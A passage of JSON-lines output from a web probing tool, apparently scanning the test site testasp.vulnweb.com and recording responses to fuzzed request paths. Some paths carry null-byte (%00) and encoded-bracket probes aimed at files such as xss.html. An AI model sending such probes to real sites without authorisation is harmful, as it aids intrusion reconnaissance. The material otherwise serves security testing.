Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.781064162Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.%5B/B%5D%5B/quote%5D\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.%5B/B%5D%5B/quote%5D\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.%5B/B%5D%5B/quote%5D\",\"time\":\"340.028676ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.790556892Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?,1,94102,3137\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?,1,94102,3137\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?,1,94102,3137\",\"time\":\"356.559725ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.790647274Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.%5B/quote%5D\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.%5B/quote%5D\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.%5B/quote%5D\",\"time\":\"344.19347ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.816720319Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.com\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com\",\"time\":\"352.300344ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.818723225Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/campaign/nike-football-training\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.com/campaign/nike-football-training\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/campaign/nike-football-training\",\"time\":\"346.865736ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.835072505Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/us/en/job/JOBID182/Software-Engineer-II-Intune-Engineering/?utm_source=facebook\\u0026utm_campaign=jobs-share\\u0026utm_medium=social-share\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.com/us/en/job/JOBID182/Software-Engineer-II-Intune-Engineering/?utm_source=facebook\\u0026utm_campaign=jobs-share\\u0026utm_medium=social-share\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/us/en/job/JOBID182/Software-Engineer-II-Intune-Engineering/?utm_source=facebook\\u0026utm_campaign=jobs-share\\u0026utm_medium=social-share\",\"time\":\"352.292162ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.837378784Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/us/en/job/JOBID182/Software-Engineer-II-Intune-Engineering/\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.com/us/en/job/JOBID182/Software-Engineer-II-Intune-Engineering/\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/us/en/job/JOBID182/Software-Engineer-II-Intune-Engineering/\",\"time\":\"358.207795ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.839492647Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/es\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.com/es\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/es\",\"time\":\"360.435717ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.846750932Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.html?shop_no=14831\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.html?shop_no=14831\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.html?shop_no=14831\",\"time\":\"342.577968ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.851032904Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg%3C/td\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg%3C/td\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.jpg%3C/td\",\"time\":\"346.844975ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:57.856878292Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.html?shop_no=14821\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.html?shop_no=14821\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.html?shop_no=14821\",\"time\":\"355.885264ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.093709313Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg%5E4111\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg%5E4111\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.jpg%5E4111\",\"time\":\"351.792945ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.14915213Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg%5Esample@email.tst\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg%5Esample@email.tst\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.jpg%5Esample@email.tst\",\"time\":\"343.928828ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.215879846Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg.html\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg.html\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.jpg.html\",\"time\":\"344.691716ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.241842814Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.jpg=\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.jpg\",\"time\":\"343.721394ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.24874423Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.kr/bl_introduce?viewID=4558\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.kr/bl_introduce?viewID=4558\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.kr/bl_introduce?viewID=4558\",\"time\":\"350.454369ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.355442623Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.php\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.php\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.php\",\"time\":\"351.348696ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.517121686Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.php?bo_table=JAV5A\\u0026wr_id=76168\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.php?bo_table=JAV5A\\u0026wr_id=76168\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.php?bo_table=JAV5A\\u0026wr_id=76168\",\"time\":\"346.157994ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.579551311Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.ru/presscenter/mediagallery/70990/?\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.ru/presscenter/mediagallery/70990/?\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.ru/presscenter/mediagallery/70990/?\",\"time\":\"339.304692ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.584559752Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.ru/presscenter/mediagallery/84999/?\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.ru/presscenter/mediagallery/84999/?\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.ru/presscenter/mediagallery/84999/?\",\"time\":\"339.894128ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.586539638Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.ru/presscenter/mediagallery/84999/\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.ru/presscenter/mediagallery/84999/\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.ru/presscenter/mediagallery/84999/\",\"time\":\"346.631456ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.598455732Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.tst%5Eokwomlcu%5E4064\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.tst%5Eokwomlcu%5E4064\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.tst%5Eokwomlcu%5E4064\",\"time\":\"348.105824ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.614786622Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.tst,1,987-65-4329,UK,3137\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.tst,1,987-65-4329,UK,3137\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.tst,1,987-65-4329,UK,3137\",\"time\":\"348.595915ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.666652131Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.tw?a_id=14687\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.tw?a_id=14687\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.tw?a_id=14687\",\"time\":\"354.355875ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.728361604Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.tw?a_id=14687\\u0026utm_source=line\\u0026utm_medium=share\\u0026utm_campaign=share_url\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?.tw?a_id=14687\\u0026utm_source=line\\u0026utm_medium=share\\u0026utm_campaign=share_url\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.tw?a_id=14687\\u0026utm_source=line\\u0026utm_medium=share\\u0026utm_campaign=share_url\",\"time\":\"352.096897ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:58.792646805Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?id_menu=598\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt?id_menu=598\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?id_menu=598\",\"time\":\"340.20224ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.075035932Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/x\",\"input\":\"http://testasp.vulnweb.com/t/x\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/x\",\"time\":\"352.400249ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.111458666Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/x,\\u003cblank\",\"input\":\"http://testasp.vulnweb.com/t/x,%3Cblank\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/x,%3Cblank\",\"time\":\"352.718543ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.113053461Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/x,0,0,0,sample@email.tst,\\u003cblank\",\"input\":\"http://testasp.vulnweb.com/t/x,0,0,0,sample@email.tst,%3Cblank\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/x,0,0,0,sample@email.tst,%3Cblank\",\"time\":\"353.561313ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.126746044Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html\",\"input\":\"http://testasp.vulnweb.com/t/xss.html\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html\",\"time\":\"353.795366ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.128767359Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg/news/story/0ap2000000266574/comments/analytics/dtm/header-2012\",\"input\":\"http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg/news/story/0ap2000000266574/comments/analytics/dtm/header-2012\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg/news/story/0ap2000000266574/comments/analytics/dtm/header-2012\",\"time\":\"345.855125ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.139765531Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg/news/story/0ap3000000944702/article/analytics/dtm/header-2012\",\"input\":\"http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg/news/story/0ap3000000944702/article/analytics/dtm/header-2012\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg/news/story/0ap3000000944702/article/analytics/dtm/header-2012\",\"time\":\"347.045904ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.144370331Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.jpg/news/story/0ap3000000944744/article/includes/news/header-2012\",\"input\":\"http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg/news/story/0ap3000000944744/article/includes/news/header-2012\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.jpg/news/story/0ap3000000944744/article/includes/news/header-2012\",\"time\":\"352.009947ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.168648628Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.21\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.21\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.21\",\"time\":\"348.569109ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.170193785Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00\",\"time\":\"351.657647ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.18173719Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.7\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.7\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.7\",\"time\":\"344.191878ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":33,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:08.186771123Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.html?%00.com\",\"input\":\"http://testasp.vulnweb.com/t/xss.html?%00.com\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.html?%00.com\",\"time\":\"348.15303ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 